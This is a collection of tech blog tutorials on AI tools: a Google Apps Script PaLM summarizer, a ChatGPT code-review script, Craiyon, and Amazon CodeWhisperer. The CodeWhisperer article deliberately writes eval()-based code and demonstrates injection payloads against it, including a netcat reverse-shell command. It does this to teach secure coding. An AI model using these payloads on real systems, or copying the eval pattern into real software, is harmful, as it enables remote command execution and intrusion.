2. On opening MakerSuite you will see something like this.
3. To get the API key, click on Get API key on the left side of the page.
4. On clicking Get API key, you will see something like this, where you can create your API key.
5. To create the API key, click on Create API key in new project.

On clicking Create API key, in a few seconds you will be able to copy the API key.

Step 2: Write the Automation Script

While you are in the Google Doc, let's open up the Script Editor to write some Google Apps Script. To open the Script Editor, follow these steps:

1. Click on Extensions and open the Script Editor.
2. This brings up the Script Editor as shown below.

We have reached the Script Editor; let's code. Now that we have the Google Doc set up and the API key ready, let's write our Google Apps Script code to get the summary for the paragraph in the Google Doc.

function onOpen(){
  var ui = DocumentApp.getUi();
  ui.createMenu('Custom Menu')
      .addItem('Summarize Selected Paragraph', 'summarizeSelectedParagraph')
      .addToUi();
}

We start by creating our own custom menu, from which we can summarize the selected paragraph and run the code. To do that, we open a new function called onOpen(). Inside the function we create a menu using the ui.createMenu() function, passing in the name of the menu. After that, we add a menu item with its label, followed by the name of the function we want to run when it is clicked.

function DocSummary(paragraph){
  var apiKey = "your_api_key";
  var apiUrl = "https://generativelanguage.googleapis.com/v1beta2/models/text-bison-001:generateText";

We open a new function, DocSummary(), inside which we declare the API key that we just copied. After declaring the API key, we declare the API endpoint that is provided in the PaLM API documentation; you can check out the documentation at the link given below. The paragraph to summarize will be passed in from the Google Doc by a function we will create shortly.

Generative Language API | PaLM API | Generative AI for Developers
The PaLM API allows developers to build generative AI applications using the PaLM model.
Large Language Models (LLMs)… (developers.generativeai.google)

  var url = apiUrl + "?key=" + apiKey;
  var headers = {
    "Content-Type": "application/json"
  };
  var prompt = {
    'text': "Please generate a short summary for :\n" + paragraph
  };
  var requestBody = {
    "prompt": prompt
  };

Here we create a new variable called url, in which we combine the API URL and the API key, resulting in a complete URL that includes the API key as a parameter. The headers specify the type of data that will be sent in the request, which in this case is "application/json". Now we come to the most important part of the code: declaring the prompt. For this blog, we will be asking the model to summarize a paragraph, followed by the paragraph present in the Google Doc. All of this is stored in the prompt variable. Now that we have the prompt ready, we create an object containing the prompt that will be sent in the request to the API.

  var options = {
    "method": "POST",
    "headers": headers,
    "payload": JSON.stringify(requestBody)
  };

Now that we have everything ready, it's time to define the parameters for the HTTP request that will be sent to the PaLM API endpoint. We start by declaring the method parameter, which is set to POST, indicating that the request will be sending data to the API. The headers parameter contains the header object we declared earlier. Finally, the payload parameter specifies the data that will be sent in the request. These options are then passed as an argument to the UrlFetchApp.fetch function, which sends the request to the PaLM API endpoint and returns the response containing the AI-generated text.

  var response = UrlFetchApp.fetch(url, options);
  var data = JSON.parse(response.getContentText());
  return data.candidates[0].output;
}

In this case, we just pass the url and options variables to the UrlFetchApp.fetch function. Having sent a request to the PaLM API endpoint, we get a response back, which we parse to extract the exact text we need. The getContentText() function extracts the text content from the response object, and since the response is in JSON format, we use the JSON.parse function to convert the JSON string into an object. From the parsed data we take the first of the multiple candidate drafts the model generates and return its output.
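For reference, a successful response from the generateText endpoint has roughly the following shape, which is why the code reads data.candidates[0].output. This is an illustrative sketch only: the exact fields (such as safety ratings and other metadata) vary, so consult the PaLM API documentation for the authoritative schema.

{
  "candidates": [
    {
      "output": "A concise summary of the selected paragraph..."
    }
  ]
}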
Now that the DocSummary() function is ready and good to go, let's write the function that interacts with the Google Doc. We want the summary to be generated for the paragraph that the user selects:

function summarizeSelectedParagraph(){
  var selection = DocumentApp.getActiveDocument().getSelection();
  var text = selection.getRangeElements()[0].getElement().getText();
  var summary = DocSummary(text);

To get the selected text from the Google Doc we use the getSelection() function, and then extract the text itself with the getText() function. To generate the summary, we pass the text to the DocSummary() function.

  DocumentApp.getActiveDocument().getBody().appendParagraph("Summary");
  DocumentApp.getActiveDocument().getBody().appendParagraph(summary);
}

Now that we have the summary for the selected text, it's time to append it back into the Google Doc. To do that, we use the appendParagraph() function, passing in the summary variable. To separate the summary from the original paragraph, we first append an additional line that says "Summary". Our code is complete and good to go.

Step 3: Check the output

It's time to check the output and see if the code works as expected. Go ahead and save your code and run the onOpen() function. This will create the menu from which we can select the paragraph and generate its summary. On running the code you should get an output like this in the Execution Log. On running the onOpen() function, the custom menu is created in the Google Doc successfully. To generate the summary in the Google Doc, follow these steps:

1. Select the paragraph you want to generate the summary for.
2. Once you select the paragraph, click on the custom menu and then on Summarize Selected Paragraph.
3. On clicking the option, you will see that the code generates a summary for the paragraph we selected.

Here you can see the summary for the paragraph has been generated in the Google Doc successfully.

Conclusion

In this blog, we walked through how to access the PaLM API to integrate Google Bard inside a Google Doc using Google Apps Script. The integration of Google Bard and Google Apps Script empowers users to generate summaries of paragraphs in Google Docs effortlessly. You can get the code from the GitHub link given below.

Google-Apps-Script/BlogSummaryPaLM.js at master · aryanirani123/Google-Apps-Script
Collection of Google Apps Script automation scripts written and compiled by Aryan Irani. (github.com)

Author Bio

Aryan Irani is a Google Developer Expert for Google Workspace. He is a writer and content creator who has been working in the Google Workspace domain for three years. He has extensive experience in the area, having published 100 technical articles on Google Apps Script, Google Workspace Tools, and Google APIs.

Website

Build a Project that Automates your Code Review

Luis Sobrecueva
19 Jun 2023
15 min read
Developers understand the importance of a solid code review process but find it time-consuming. Large language models (LLMs) offer a solution by providing insights into code flows and enforcing best practices. This project aims to automate code reviews using LLMs, revolutionizing developers' approach. An intelligent assistant will swiftly analyze code differences, generating feedback in seconds. Imagine having an AI-powered reviewer guiding you to write cleaner, more efficient code. The focus is to streamline the code review workflow, empowering developers to produce high-quality code while saving time. The system will offer comprehensive insights through automated analysis, highlighting areas that need attention and suggesting improvements. By embracing LLMs' potential and automation, this project aims to make code reviews seamless and rewarding. Join the journey to explore LLMs' impact on code review and enhance the development experience.

Project Overview

In this article, we are developing a Python program that will harness the power of OpenAI's ChatGPT for code review. This program will read diff changes from the standard input and generate comprehensive code review comments. The generated comments will be compiled into an HTML file, which will include AI-generated feedback for each diff file section, presented alongside the diff sections themselves as code blocks with syntax highlighting. To simplify the review process, the program will automatically open the HTML file in the user's default web browser.

Image 1: Project Page

Build your Project

Let's walk through the steps to build this code review program from scratch. By following these steps, you'll be able to create your own implementation tailored to your specific needs. Let's get started:

1. Set Up Your Development Environment. Ensure you have Python installed on your machine. You can download and install the latest version of Python from the official Python website.

2. Install Required Libraries. To interact with OpenAI's ChatGPT and handle diff changes, you'll need to install the necessary Python libraries using pip, the package installer for Python. The script below relies on the openai and tqdm packages, so install them by running the following command in your terminal:

pip install openai tqdm

3. To implement the next steps, create a new Python file named `chatgpt_code_reviewer.py`.

4. Import the necessary modules:

import argparse
import os
import random
import string
import sys
import webbrowser

import openai
from tqdm import tqdm

5. Set up the OpenAI API key (you'll need to get a key at https://openai.com if you don't have one yet), along with a default review prompt. The script's main function falls back to a PROMPT_TEMPLATE constant when no custom prompt is passed; the full template ships with the project repository, so the wording below is only a placeholder:

openai.api_key = os.environ["OPENAI_KEY"]

# Placeholder default prompt; replace with the template from the repository
PROMPT_TEMPLATE = (
    "You are an experienced code reviewer. Review the following changes, "
    "pointing out bugs, style issues, and possible improvements."
)
6. Define a function to format code snippets within the code review comments, ensuring they are easily distinguishable and readable within the generated HTML report:

def add_code_tags(text):
    # Find all the occurrences of text surrounded by backticks
    import re
    matches = re.finditer(r"`(.+?)`", text)
    # Create a list to store the updated text chunks
    updated_chunks = []
    last_end = 0
    for match in matches:
        # Add the text before the current match
        updated_chunks.append(text[last_end : match.start()])
        # Add the matched text surrounded by <code> tags
        updated_chunks.append("<b>`{}`</b>".format(match.group(1)))
        # Update the last_end variable to the end of the current match
        last_end = match.end()
    # Add the remaining text after the last match
    updated_chunks.append(text[last_end:])
    # Join the updated chunks and return the resulting HTML string
    return "".join(updated_chunks)

7. Define a function to generate a comment using ChatGPT:

def generate_comment(diff, chatbot_context):
    # Use OpenAI ChatGPT to generate a comment on the file changes
    chatbot_context.append(
        {
            "role": "user",
            "content": f"Make a code review of the changes made in this diff: {diff}",
        }
    )
    # Retry up to three times
    retries = 3
    for attempt in range(retries):
        try:
            response = openai.ChatCompletion.create(
                model="gpt-3.5-turbo",
                messages=chatbot_context,
                n=1,
                stop=None,
                temperature=0.3,
            )
            break  # Success; stop retrying
        except Exception as e:
            if attempt == retries - 1:
                print(f"attempt: {attempt}, retries: {retries}")
                raise e  # Raise the error if maximum retries reached
            else:
                print("OpenAI error occurred. Retrying...")
                continue
    comment = response.choices[0].message.content
    # Reset the chatbot context to the latest request and response
    chatbot_context = [
        {
            "role": "user",
            "content": f"Make a code review of the changes made in this diff: {diff}",
        },
        {
            "role": "assistant",
            "content": comment,
        },
    ]
    return comment, chatbot_context

The `generate_comment` function defined above uses OpenAI ChatGPT to generate a code review comment based on the provided `diff` and the existing `chatbot_context`. It appends the user's request to review the changes to the `chatbot_context`. The function retries the API call up to three times to handle transient errors, breaking out of the loop as soon as a response is received. It makes use of the `openai.ChatCompletion.create()` method and provides the appropriate model, messages, and other parameters to generate a response. The generated comment is extracted from the response, and the chatbot context is reset to contain only the latest user request and assistant response. Finally, the function returns the comment and the updated chatbot context. This function will be a crucial part of the code review program, as it uses ChatGPT to generate insightful comments on the provided code diffs.
8. Define a function to create the HTML output:

def create_html_output(title, description, changes, prompt):
    random_string = "".join(random.choices(string.ascii_letters, k=5))
    output_file_name = random_string + "-output.html"
    title_text = f"\nTitle: {title}" if title else ""
    description_text = f"\nDescription: {description}" if description else ""
    chatbot_context = [
        {
            "role": "user",
            "content": f"{prompt}{title_text}{description_text}",
        }
    ]
    # Generate the HTML output
    html_output = "<html>\n<head>\n<style>\n"
    html_output += "body {\n    font-family: Roboto, Ubuntu, Cantarell, Helvetica Neue, sans-serif;\n    margin: 0;\n    padding: 0;\n}\n"
    html_output += "pre {\n    white-space: pre-wrap;\n    background-color: #f6f8fa;\n    border-radius: 3px;\n    font-size: 85%;\n    line-height: 1.45;\n    overflow: auto;\n    padding: 16px;\n}\n"
    html_output += "</style>\n"
    html_output += '<link rel="stylesheet"\n href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.7.0/styles/default.min.css">\n <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.7.0/highlight.min.js"></script>\n'
    html_output += "<script>hljs.highlightAll();</script>\n"
    html_output += "</head>\n<body>\n"
    html_output += "<div style='background-color: #333; color: #fff; padding: 20px;'>"
    html_output += "<h1 style='margin: 0;'>AI code review</h1>"
    html_output += f"<h3>Diff to review: {title}</h3>" if title else ""
    html_output += "</div>"
    # Generate comments for each diff with a progress bar
    with tqdm(total=len(changes), desc="Making code review", unit="diff") as pbar:
        for i, change in enumerate(changes):
            diff = change["diff"]
            comment, chatbot_context = generate_comment(diff, chatbot_context)
            pbar.update(1)
            # Write the diff and comment to the HTML
            html_output += f"<h3>Diff</h3>\n<pre><code>{diff}</code></pre>\n"
            html_output += f"<h3>Comment</h3>\n<pre>{add_code_tags(comment)}</pre>\n"
    html_output += "</body>\n</html>"
    # Write the HTML output to a file
    with open(output_file_name, "w") as f:
        f.write(html_output)
    return output_file_name

The `create_html_output` function defined above takes the `title`, `description`, `changes`, and `prompt` as inputs. It creates an HTML output file that contains the code review comments for each diff, along with the corresponding diff sections as code blocks with syntax highlighting. Let's explain it in more detail:

First, the function initializes a random string to be used in the output file name. It creates the appropriate title and description text based on the provided inputs and sets up the initial `chatbot_context`. Next, the function generates the HTML structure and styling, including the necessary CSS and JavaScript libraries for syntax highlighting. It also includes a header section for the AI code review. Using a progress bar, the function iterates over each change in the changes list. For each change, it retrieves the `diff` and generates a comment using the `generate_comment` function. The progress bar is updated accordingly. The function then writes the `diff` and the corresponding comment to the HTML output. The `diff` is displayed within a `<pre><code>` block for better formatting, and the comment is wrapped in `<pre>` tags. The `add_code_tags` function is used to add code tags to the comment, highlighting any code snippets.
After processing all the changes, the function completes the HTML structure by closing the `<body>` and `<html>` tags. Finally, the HTML output is written to a file with a randomly generated name, and that file name is returned by the function. This `create_html_output` function produces the final HTML output that presents the code review comments alongside the corresponding diff sections.

9. Define a function to get diff changes from the pipeline:

def get_diff_changes_from_pipeline():
    # Get the piped input
    piped_input = sys.stdin.read()
    # Split the input into a list of diff sections
    diffs = piped_input.split("diff --git")
    # Create a list of dictionaries, where each dictionary contains a single diff section
    diff_list = [{"diff": diff} for diff in diffs if diff]
    return diff_list

The `get_diff_changes_from_pipeline` function defined above retrieves the input from the pipeline, which is typically the output of a command like `git diff`. It reads the piped input using `sys.stdin.read()`. The input is then split on the "diff --git" string, which is commonly used to separate individual diff sections, producing a list of diff sections. By dividing the diff into separate sections, this function enables code reviews of very large projects: it overcomes the context limitation of LLMs by processing each diff section independently. This approach allows for efficient and scalable code reviews, ensuring that the review process can handle projects of any size. The function returns the list of diff sections as its output, which can be further processed and utilized in the code review pipeline.

10. Define the main function:

def main():
    title, description, prompt = None, None, None
    changes = get_diff_changes_from_pipeline()
    # Parse command line arguments
    parser = argparse.ArgumentParser(description="AI code review script")
    parser.add_argument("--title", type=str, help="Title of the diff")
    parser.add_argument("--description", type=str, help="Description of the diff")
    parser.add_argument("--prompt", type=str, help="Custom prompt for the AI")
    args = parser.parse_args()
    title = args.title if args.title else title
    description = args.description if args.description else description
    prompt = args.prompt if args.prompt else PROMPT_TEMPLATE
    output_file = create_html_output(title, description, changes, prompt)
    try:
        webbrowser.open(output_file)
    except Exception:
        print(f"Error running the web browser, you can try to open the output file: {output_file} manually")

if __name__ == "__main__":
    main()

The `main` function serves as the entry point of the code review script. It begins by initializing the `title`, `description`, and `prompt` variables as `None`. Next, it calls the `get_diff_changes_from_pipeline` function to retrieve the diff changes from the pipeline; these changes will be used for the code review process. The script then parses the command line arguments using the `argparse` module, which allows specifying optional arguments such as `--title`, `--description`, and `--prompt` to customize the code review process. The values provided through the command line are assigned to the corresponding variables, overriding the default `None` values; when no custom prompt is given, the `PROMPT_TEMPLATE` constant defined earlier is used. After parsing the arguments, the `create_html_output` function is called to generate the HTML output file, with `title`, `description`, `changes`, and `prompt` passed as arguments. The output file name is returned and stored in the `output_file` variable.
Finally, the script attempts to open the generated HTML file in the default web browser using the `webbrowser` module. If an error occurs during the process, a message is printed, suggesting manually opening the output file.

11. Save the file and run it using the following command:

git diff master..branch | python3 chatgpt_code_reviewer.py

A progress bar will be displayed, and after a while the browser will open an HTML file with the output of the command. Depending on the number of files to review, it may take a few seconds or a few minutes; you can see the process in this video.

Congratulations! You have now created your own ChatGPT code reviewer project from scratch. Remember to adapt and customize the prompt[1] based on your specific requirements and preferences. You can find the complete code in the ChatGPTCodeReviewer GitHub repository. Happy coding!

Article Reference

[1] The prompt is an essential component of the code review process using ChatGPT. It is typically a text that sets the context and provides instructions to the AI model about what is expected from its response, such as what it needs to review, specific questions, or guidelines to focus the AI's attention on particular aspects of the code. In the code, a default PROMPT_TEMPLATE is used if no custom prompt is provided. You can modify the PROMPT_TEMPLATE variable or pass your own prompt using the `--prompt` argument to tailor the AI's behavior to your specific requirements. By carefully crafting the prompt, you can help steer the AI's responses in a way that aligns with your code review expectations, ensuring the generated comments are relevant, constructive, and aligned with the desired code quality standards.

Author Bio

Luis Sobrecueva is a software engineer with many years of experience working with a wide range of different technologies in various operating systems, databases, and frameworks. He began his professional career developing software as a research fellow in the engineering projects area at the University of Oviedo. He continued in a private company developing low-level (C/C++) database engines and visual development environments, and later jumped into the world of web development, where he met Python and discovered his passion for machine learning, applying it to various large-scale projects, such as creating and deploying a recommender for a job board with several million users. It was also at that time that he began contributing to open-source deep learning projects and participating in machine learning competitions, earning various certifications, including a MicroMasters Program in Statistics and Data Science at MIT and a Udacity Deep Learning Nanodegree. He currently works as a data engineer at a ride-hailing company called Cabify, while continuing to develop his career as an ML engineer by consulting and contributing to open-source projects such as OpenAI and AutoKeras.

Author of the book: Automated Machine Learning with AutoKeras

Creating Stunning Images from Text Prompt using Craiyon

Julian Melanson
21 Jun 2023
6 min read
In an era marked by rapid technological progress, artificial intelligence continues to permeate various fields, fostering innovation and transforming paradigms. One area that has notably experienced a surge of AI integration is the world of digital art. A range of AI-powered websites and services have emerged, enabling users to transform text descriptions into images, artwork, and drawings. Among these innovative platforms, Craiyon, formerly known as DALL-E mini, stands out as a compelling tool that transforms the artistic process through its unique text-to-image generation capabilities.

Developed by Boris Dayma, Craiyon was born out of an aspiration to create a free, accessible AI tool that could convert textual descriptions into corresponding visuals. The concept of Craiyon was not conceived in isolation; rather, it emerged as a collaborative effort, with contributions from the expansive open-source community playing a significant role in the evolution of its capabilities.

The AI behind Craiyon leverages the computing power of Google's TPU Research Cloud (TRC). It undergoes rigorous training that imbues it with the ability to generate novel images based on user-provided textual inputs. In addition, Craiyon houses an expansive library of existing images that can further assist users in refining their queries.

While the abilities of such an image generation model are undeniably impressive, certain limitations do exist. For instance, the model sometimes generates unexpected or stereotypical imagery, reflecting inherent biases in the datasets it was trained on. Notwithstanding these constraints, Craiyon's innovative technology holds substantial promise for the future of digital art.

Image 1: Craiyon home page

Getting Started with Craiyon

If you wish to test the waters with Craiyon's AI, the following steps can guide you through the process:

Accessing Craiyon: First, navigate to the Craiyon website: https://www.craiyon.com. While you have the option to create a free account, you might want to familiarize yourself with the platform before doing so.

Describing Your Image: Upon landing on the site, you will find a space where you can type a description of the image you wish to generate. To refine your request, consider specifying elements you want to be excluded from the image. Additionally, decide whether you want your image to resemble a piece of art, a drawing, or a photo.

Initiating the Generation Process: Once you are satisfied with your description, click the "Draw" button. The generation process might take a moment, but it will eventually yield multiple images that match your description.

Selecting and Improving Your Image: Choose an image that catches your eye. For a better viewing experience, you can upscale the resolution and quality of the image. If you wish to save the image, use the "Screenshot" button.

Revising Your Prompt: If you are not satisfied with the generated images, consider revising your prompt. Craiyon might suggest alternative prompts to help you obtain improved results.

Viewing and Saving Your Images: If you have created a free account, you can save the images you like by clicking the heart icon. You can subsequently access these saved images through the "My Collection" option under the "Account" button.

Use Cases

Creating art and illustrations: Craiyon can be used to create realistic and creative illustrations, paintings, and other artworks.
This can be a great way for artists to explore new ideas and techniques, or to create digital artworks that would be difficult or time-consuming to create by hand.

Generating marketing materials: Craiyon can be used to create eye-catching images and graphics for marketing campaigns. This could include social media posts, website banners, or product illustrations.

Designing products: Craiyon can be used to generate designs for products, such as clothing, furniture, or toys. This can be a great way to get feedback on new product ideas, or to create prototypes of products before they are manufactured.

Educating and communicating: Craiyon can be used to create educational and informative images. This could include diagrams, charts, or infographics. Craiyon can also be used to create images that communicate complex ideas in a more accessible way.

Personalizing experiences: Craiyon can be used to personalize experiences, such as creating custom wallpapers, avatars, or greeting cards. This can be a great way to add a touch of individuality to your devices or communication.

Craiyon is still under development, but it has the potential to be a powerful tool for a variety of uses. As the technology continues to improve, we can expect to see even more creative and innovative use cases for Craiyon in the future.

Here are some additional use cases for Craiyon:

Generating memes: Craiyon can be used to generate memes, which are humorous images that are often shared online. This can be a fun way to express yourself or to join in on a current meme trend.

Creating custom content: Craiyon can be used to create custom content for your website, blog, or social media channels. This could include images, graphics, or even videos.

Experimenting with creative ideas: Craiyon can be used to experiment with creative ideas. If you have an idea for an image or illustration, you can use Craiyon to see how it would look. This can be a great way to get feedback on your ideas or to explore new ways of thinking about art.

Summary

The emergence of AI tools like Craiyon marks a pivotal moment in the intersection of art and technology. While it's crucial to acknowledge the limitations of such tools, their potential to democratize artistic expression and generate creative inspiration is indeed remarkable. As Craiyon and similar platforms continue to evolve, we can look forward to a future where the barriers between language and visual expression are further blurred, opening up new avenues for creativity and innovation.

Author Bio

Julian Melanson is one of the founders of Leap Year Learning. Leap Year Learning is a cutting-edge online school that specializes in teaching creative disciplines and integrating AI tools. We believe that creativity and AI are the keys to a successful future and our courses help equip students with the skills they need to succeed in a continuously evolving world. Our seasoned instructors bring real-world experience to the virtual classroom and our interactive lessons help students reinforce their learning with hands-on activities.

No matter your background, from beginners to experts, hobbyists to professionals, Leap Year Learning is here to bring in the future of creativity, productivity, and learning!

Writing Secure Code with Amazon CodeWhisperer

Joshua Arvin Lat
10 Nov 2023
12 min read
Introduction

Have you ever used an AI coding assistant like Amazon CodeWhisperer? If not, you'll be surprised at how these AI-powered tools can significantly accelerate the coding process. In the past, developers had to rely solely on their expertise and experience to build applications. At the moment, we're seeing the next generation of developers leverage AI to not only speed up the coding process but also to ensure that their applications meet the highest standards of security and reliability.

In this blog post, we will dive deep into how we can use CodeWhisperer to (1) speed up the coding process and (2) detect vulnerabilities and issues in our code. We'll have the following sections in this post:

Part 01 — Technical Requirements
Part 02 — Avoiding conflicts or issues with existing installed extensions
Part 03 — Using Amazon CodeWhisperer to accelerate Python coding work
Part 04 — Realizing and proving that our code is vulnerable
Part 05 — Detecting security vulnerabilities with Amazon CodeWhisperer

Without further ado, let's begin!

Part 01 — Technical Requirements

You need to have Amazon CodeWhisperer installed and configured with VS Code on your local machine. Note that we will be using CodeWhisperer Professional for a single user. Make sure to check the pricing page (https://aws.amazon.com/codewhisperer/pricing/), especially if this is your first time using CodeWhisperer. Before installing and setting up the CodeWhisperer extension in VS Code, you need to:

(1) Enable IAM Identity Center and create an AWS organization
(2) Create an IAM organization user
(3) Set up CodeWhisperer for a single user, and
(4) Set up the AWS Toolkit for VS Code (https://aws.amazon.com/visualstudiocode/).

Make sure that the CodeWhisperer extension is installed and set up completely before proceeding. We'll skip the steps for setting up and configuring VS Code so that we can focus more on how to use the different features and capabilities of Amazon CodeWhisperer.

Note: Feel free to check the following link for more information on how to set up CodeWhisperer: https://docs.aws.amazon.com/codewhisperer/latest/userguide/whisper-setup-prof-devs.html.

Part 02 — Avoiding conflicts or issues with existing installed extensions

To ensure that other installed extensions won't conflict with the AWS Toolkit, we have the option to disable all installed extensions, similar to what is shown in the following image:

Image 01 — Disabling All Installed Extensions

Once all installed extensions have been disabled, we need to make sure that the AWS Toolkit is enabled by locating the said extension under the list of installed extensions and then clicking the Enable button (as highlighted in the following image):

Image 02 — Enabling the AWS Toolkit extension

The AWS Toolkit may require you to connect and authenticate again. For more information on how to manage extensions in VS Code, feel free to check the following link: https://code.visualstudio.com/docs/editor/extension-marketplace

Part 03 — Using Amazon CodeWhisperer to accelerate Python coding work

STEP # 01: Let's start by creating a new file in VS Code.
Name it whisper.py (or any other filename).

Image 03 — Creating a new file

STEP # 02: Type the following single-line comment in the first line:

# Create a calculator function that accepts a string expression using input() and uses eval() to evaluate the expression

STEP # 03: Next, press the ENTER key.

You should see a recommended line of code after a few seconds. In case the recommendation disappears (or does not appear at all), feel free to press OPTION + C (if you're on Mac) or ALT + C (if you're on Windows or Linux) to trigger the recommendation:

Image 04 — CodeWhisperer suggesting a single line of code

STEP # 04: Press TAB to accept the code suggestion

Image 05 — Accepting the code suggestion by pressing TAB

STEP # 05: Press ENTER to go to the next line. You should see a code recommendation after a few seconds. In case the recommendation disappears (or does not appear at all), feel free to press OPTION + C (if you're on Mac) or ALT + C (if you're on Windows or Linux) to trigger the recommendation:

Image 06 — CodeWhisperer suggesting a block of code

STEP # 06: Press TAB to accept the code suggestion

Image 07 — Accepting the code suggestion by pressing TAB

STEP # 07: Press ENTER twice and then backspace.

STEP # 08: Type if and you should see a recommendation similar to what we have in the following image:

Image 08 — CodeWhisperer suggesting a line of code

STEP # 09: Press ESC to ignore the recommendation.

STEP # 10: Press OPTION + C (if you're on Mac) or ALT + C (if you're on Windows or Linux) to trigger another recommendation

Image 09 — CodeWhisperer suggesting a block of code

STEP # 11: Press TAB to accept the code suggestion

Image 10 — Accepting the code suggestion by pressing TAB

Note that you might get a different set of recommendations when using CodeWhisperer. In cases where there are multiple recommendations, you can use the left (←) and right (→) arrow keys to select from the list of available recommendations.

In case you are planning to try the hands-on examples yourself, here is a copy of the code generated in the previous set of steps:

# Create a calculator function that accepts a string expression using input() and uses eval() to evaluate the expression
def calculator():
    expression = input("Enter an expression: ")
    result = eval(expression)
    print(result)
    return result

if __name__ == "__main__":
    calculator()
    # ...

STEP # 12: Open a New Terminal (inside VS Code):

Image 11 — Opening a new Terminal inside VS Code

STEP # 13: Assuming that we are able to run Python scripts locally (that is, with our local machine properly configured), we should be able to run our script by running the following (or a similar command depending on how your local machine is set up):

python3 whisper.py

Image 12 — Running the code locally

If you entered the expression 1 + 1 and got a result of 2, then our application is working just fine!

Part 04 — Realizing and proving that our code is vulnerable

In order to write secure code, it's essential that we have a good idea of how our code could be attacked and exploited. Note that we are running the examples in this section on a Mac.
In case you're unable to run some of the commands on your local machine, that should be alright, as we are just demonstrating in this section why the seemingly harmless eval() function should be avoided whenever possible.

STEP # 01: Let's run the whisper.py script again and specify print('hello') when asked to input an expression.

print('hello')

This should print hello, similar to what we have in the following image:

Image 13 — Demonstrating why using eval() is dangerous

Looks like we can take advantage of this vulnerability and run any valid Python statement! Once a similar set of lines is used in a backend Web API implementation, an attacker might be able to inject commands as part of the request which could be processed by the eval() statement. This in turn could allow attackers to inject commands that would connect the target system and the attacker machine with something like a reverse shell.

STEP # 02: Let's run whisper.py again and specify the following statement when asked to input an expression:

__import__('os').system('echo hello')#

This should run the bash command and print hello, similar to what we have in the following image:

Image 14 — Another example to demonstrate why using eval() is dangerous

STEP # 03: Let's take things a step further! Let's open the Terminal app and use netcat to listen on port 14344 by running the following command:

nc -nvl 14344

Image 15 — Using netcat to listen on port 14344

Note that we are running the command inside the Terminal app (not the terminal window inside VS Code).

STEP # 04: Navigate back to the VS Code window and run whisper.py again. This time, let's enter the following malicious input when asked to enter an expression:

__import__('os').system('mkfifo /tmp/ABC; cat /tmp/ABC | /bin/sh -i 2>&1 | nc localhost 14344 > /tmp/ABC')#

This would cause the application to wait until the reverse shell is closed on the other side (that is, from the terminal window we opened in the previous step).

Image 16 — Entering a malicious input to start a reverse shell

Note that in order to get this to work, /tmp/ABC must not exist yet before the command runs. Feel free to delete /tmp/ABC in case you need to retry this experiment.

STEP # 05: Back in our separate terminal window, we should be able to access a shell similar to what we have in the following image:

Image 17 — Reverse shell

From here, an attacker could potentially run commands that would help them steal the data stored in the compromised machine or use the compromised machine to attack other resources. Since this is just a demonstration, simply run exit to close the shell. It is important to note that in our simplified example, we used the same system for the attacker and victim machines.

Image 18 — How attackers could connect the target machine to the attacker machine

Of course, in real-life scenarios and penetration testing activities, the attacker machine would be a separate/external machine. This means that the malicious input needs to be modified with the external attacker's IP address (and not localhost).

Important Note: It is unethical and illegal to attack resources owned by another user or company. These concepts and techniques were shared to help you understand the risks involved when using vulnerable functions such as eval().

Part 05 — Detecting security vulnerabilities with Amazon CodeWhisperer

Do you think most developers would even know that the exploit we performed in the previous section is even possible? Probably not!
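Knowing how the attack works also suggests what a fix can look like. As a hedged sketch (our own illustration, not CodeWhisperer output and not from the original article), the calculator could replace eval() with a small whitelisted AST evaluator so that only plain arithmetic is accepted:

import ast
import operator

# Whitelist of arithmetic operators the calculator is allowed to evaluate
OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}

def safe_eval(expression):
    """Evaluate a plain arithmetic expression; raise ValueError for anything else."""
    def _eval(node):
        if isinstance(node, ast.Expression):
            return _eval(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -_eval(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in OPS:
            return OPS[type(node.op)](_eval(node.left), _eval(node.right))
        # Function calls, attribute access, __import__, etc. all land here
        raise ValueError("unsupported expression")
    return _eval(ast.parse(expression, mode="eval"))

def calculator():
    print(safe_eval(input("Enter an expression: ")))

if __name__ == "__main__":
    calculator()

With this variant, an input of 1 + 1 still returns 2, while the malicious payloads shown above raise ValueError instead of executing.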
One of the ways to help developers write more secure code (that is, without having to learn how to attack and exploit their own code) is by having a tool that automatically detects vulnerabilities in the code being written. The good news is that CodeWhisperer gives us the ability to run security scans with a single push of a button! We'll show you how to do this in the next set of steps:

STEP # 01: Click the AWS icon highlighted in the following image:

Image 19 — Running a security scan using Amazon CodeWhisperer

You should find CodeWhisperer under Developer Tools, similar to what we have in Image 19. Under CodeWhisperer, you should find several options such as Pause Auto-Suggestions, Run Security Scan, Select Customization, Open Code Reference Log, and Learn.

STEP # 02: Click the Run Security Scan option. This will run a security scan that will flag several vulnerabilities and issues, similar to what we have in the following image:

Image 20 — Results of the security scan

The security scan may take about a minute to complete. It is important for you to be aware that while this type of security scan will not detect all the vulnerabilities and issues in your code, adding this step during the coding process would definitely prevent a lot of security issues and vulnerabilities.

Note that we won't discuss in this post how to fix the current code. In case you're wondering what the next steps are, all you need to do is perform the needed modifications and then run the security scan again. Of course, there would be a bit of trial and error involved, as resolving the vulnerabilities may not be as straightforward as it looks.

Conclusion

In this post, we were able to showcase the different features and capabilities of Amazon CodeWhisperer. If you are interested to learn more about how various AI tools can accelerate the coding process, feel free to check Chapter 9 of my 3rd book "Building and Automating Penetration Testing Labs in the Cloud". You'll learn how to use AI solutions such as ChatGPT, GitHub Copilot, GitHub Copilot Labs, Amazon CodeWhisperer, and Tabnine Pro to significantly accelerate the coding process.

Author Bio

Joshua Arvin Lat is the Chief Technology Officer (CTO) of NuWorks Interactive Labs, Inc. He previously served as the CTO of three Australian-owned companies and also served as the Director for Software Development and Engineering for multiple e-commerce startups in the past. Years ago, he and his team won 1st place in a global cybersecurity competition with their published research paper. He is also an AWS Machine Learning Hero and he has been sharing his knowledge at several international conferences, discussing practical strategies on machine learning, engineering, security, and management. He is also the author of the books "Machine Learning with Amazon SageMaker Cookbook", "Machine Learning Engineering on AWS", and "Building and Automating Penetration Testing Labs in the Cloud". Due to his proven track record in leading digital transformation within organizations, he has been recognized as one of the prestigious Orange Boomerang: Digital Leader of the Year 2023 award winners.


AI-Powered Data Visualization with Snowflake

Shankar Narayanan
19 Oct 2023
8 min read
Introduction

